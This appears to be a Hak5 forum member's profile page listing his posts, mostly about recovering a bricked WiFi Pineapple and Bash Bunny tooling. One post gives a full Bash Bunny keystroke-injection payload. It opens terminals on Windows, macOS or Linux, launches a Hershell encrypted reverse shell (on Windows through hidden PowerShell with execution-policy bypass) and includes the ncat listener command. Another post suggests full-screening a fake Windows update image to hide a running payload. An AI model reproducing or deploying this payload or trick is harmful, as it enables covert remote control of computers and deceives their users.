Jump to content

mkmk

Active Members
  • Content Count

    18
  • Joined

  • Last visited

  • Days Won

    1

About mkmk

  • Rank
    Hak5 Fan

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Hey All. Does anyone know if there's a way to wipe the nano and use it like a Linux box with 2 WiFi AP's? I'm hoping to have one AP permanently as a hotspot and the other connected to another WiFi network and sharing internet to the hotspot AP.
  2. Awesome work @Zylla. I think we can install this via opkg now too, or at least it seemed to work for me: opkg update opkg install tmux And i think the updated git location for @Zylla https://github.com/adde88/openwrt-useful-tools/tree/packages-15.05 And also https://github.com/adde88/openwrt-useful-tools But correct me if i'm wrong.
  3. My apologies @Foxtrot After a bit more messing around it finally worked, as follows: Held reset button Plugged in power adaptor Continued to hold power button for 10-seconds Plugged USB cable into ETH Executed "sudo ifconfig enx001337 192.168.1.2 netmask 255.255.255.0 up" Connected to http://192.168.1.1 and updated firmware Connected to Pineapple_XXXX via WiFi Completed setup Updated to latest firmware Thanks for your help!
  4. Unfortunately that doesn't work, i.e. the Web Console no longer appears. It appeared initially when i flashed the factory image as mentioned in my initial post but the web console now no longer appears. Is there a way it can be flashed via UART?
  5. How do i flash the factory image if i can't access the web console?
  6. Hi All, Unfortunately my Pineapple failed to complete a firmware update so i attempted to install the update using the 192.168.1.1 http method. This appeared to work at first but the Amber light stayed on for more than an hour so i tried resetting the unit. Unfortunately, the amber light stays on permanently now and i'm unable to access the http interface even though i can appear to enable this via the serial console: uboot> httpd Using eth0 dup 1 speed 100 MAC address: 0x0:0x3:0x7f:0x9:0xb:0xad HTTP server is starting at IP: 192.168.1.1 HTTP server is ready! Also, i'm getting the "Bad Magic Number" error as shown below: uboot> boot Loading from device 0: ath-nand (offset 0x0) ** Bad Magic Number 0x73797375 ** uboot> bootd Loading from device 0: ath-nand (offset 0x0) ** Bad Magic Number 0x73797375 ** Is there a way i can load the factory image via the UART port? Thanks.
  7. Not a problem! Also, just to confirm. Hershell was written by Ronan Kervella and his Github contains several other interesting projects: https://github.com/sysdream
  8. Hey @JediMasterX. Feel free to give it a bash and let me know how you go on this forum or via pm. I'm aiming to have version 1.0 automatically detect the target OS and perform seamless exploitation but for now the OS selection is manual.
  9. Does anyone know if there is a way to specify which antenna's to use when capturing / airodumping? I'm working on a device location type tool that will use specific antenna's on the Tetra in order to physically locate clients.
  10. I'm sure other people have thought of this before, but a cool trick would be to full-screen a Windows update screenshot so the user thinks their machine is doing updates, then run your payload in the background. Anyone have any experience with this?
  11. Thanks for the tip. I'll do some investigation.
  12. Please PM me if there any issues/improvements. Thanks! #!/bin/bash # Title: Hershell Encrypted Reverse Shell (Cross-platform - Manual Mode) # Author: metalkey # Version: 0.5 # Target: Windows, Mac OSX, Linux # Creds: Ronan Kervella (Creator of Hershell) - https://github.com/sysdream/hershell # Instructions: # Hershell Github: https://github.com/sysdream/hershell (read all instructions on Hershell git before starting) # 1. Compile all payloads and place binaries in the payloads\$SWITCH_POSITION directory (Double check binary names. Defaults are mac32, linux32, win32.exe) # 2. Uncomment desired target OS payload lines and ensure others are commented out # 3. Start ncat listener on your attacking machine, that is to receive the reverse shell (e.g. ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 4343) # 4. Execute attack via Bash Bunny # SETUP DRIVER_LABEL='WINDOWS' # Drive label for your Bash Bunny LED R GET SWITCH_POSITION # Gets switch position (e.g. switch2) ATTACKMODE STORAGE HID SERIAL # Keyboard HID Attack + Storage + Serial # Modified RUN helper function RUN() { local os=$1 shift [[ -z "$os" || -z "$*" ]] && exit 1 case "$os" in WIN) QUACK GUI m QUACK DELAY 500 QUACK GUI r QUACK DELAY 500 QUACK STRING cmd.exe QUACK DELAY 100 QUACK ENTER QUACK DELAY 500 QUACK STRING "$@" QUACK DELAY 100 QUACK ENTER ;; OSX) QUACK GUI SPACE QUACK DELAY 100 QUACK STRING terminal QUACK DELAY 100 QUACK ENTER QUACK GUI t QUACK DELAY 100 QUACK STRING /bin/bash QUACK DELAY 100 QUACK ENTER QUACK STRING "$@" QUACK DELAY 100 QUACK ENTER QUACK DELAY 100 QUACK STRING "exit" QUACK DELAY 100 QUACK ENTER QUACK DELAY 100 QUACK STRING "exit" QUACK DELAY 100 QUACK ENTER ;; UNITY) QUACK ALT F2 QUACK DELAY 1000 QUACK STRING xterm QUACK DELAY 1000 QUACK ENTER QUACK DELAY 1000 QUACK STRING /bin/bash QUACK DELAY 1000 QUACK ENTER QUACK DELAY 500 QUACK STRING cd /media/'$USER' QUACK DELAY 500 QUACK ENTER QUACK DELAY 500 QUACK STRING "$@" QUACK DELAY 500 QUACK ENTER QUACK DELAY 500 QUACK STRING "exit" QUACK DELAY 500 QUACK ENTER QUACK DELAY 500 QUACK STRING "exit" QUACK DELAY 500 QUACK ENTER ;; *) exit 1 ;; esac } export -f RUN # START Attack LED Y # [+] Mac - Uncomment the following lines to use: # until ls -halt /dev | head -n 5 | grep -q "nandf"; do sleep 1; done # Wait for bb to mount # LED Y FAST # RUN OSX "cp /Volumes/$DRIVER_LABEL/payloads/$SWITCH_POSITION/mac32 /tmp && chmod +x /tmp/mac32 && /tmp/mac32 &" # [+] Linux - Uncomment the following lines to use: until dmesg | grep -q "sunxi_usb"; do sleep 1; done; sleep 5 # Wait for bb to mount LED Y FAST RUN UNITY "cd $DRIVER_LABEL/payloads/$SWITCH_POSITION && cp linux32 /tmp/ && chmod +x /tmp/linux32 && /tmp/linux32 &" # [+] Windows - Uncomment the following lines to use: # until dmesg | grep -q "sunxi_usb"; do sleep 1; done; sleep 5 # Wait for bb to mount # LED Y FAST # RUN WIN powershell -NoP -NonI -W Hidden -exec bypass ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'\payloads\\$SWITCH_POSITION\win32.exe')" # END sleep 5 LED G # shutdown 0 # LIGHTS OUT = Shutdown and dismount (if desired)
  13. This has worked well on the Mac systems i've tested: until ls -halt /dev | head -n 5 | grep -q "nandf"; do sleep 1;
  14. I've just started looking into the concept of determining the TARGET OS by checking the timestamps of hidden folders on the bb after it has been mounted, e.g. "System Volume Information", etc.... Potentially something involving an ls -halt of the udisk directory but would be good if there are some better ideas to build on this concept. Has anyone had much experience with this?
×
×
  • Create New...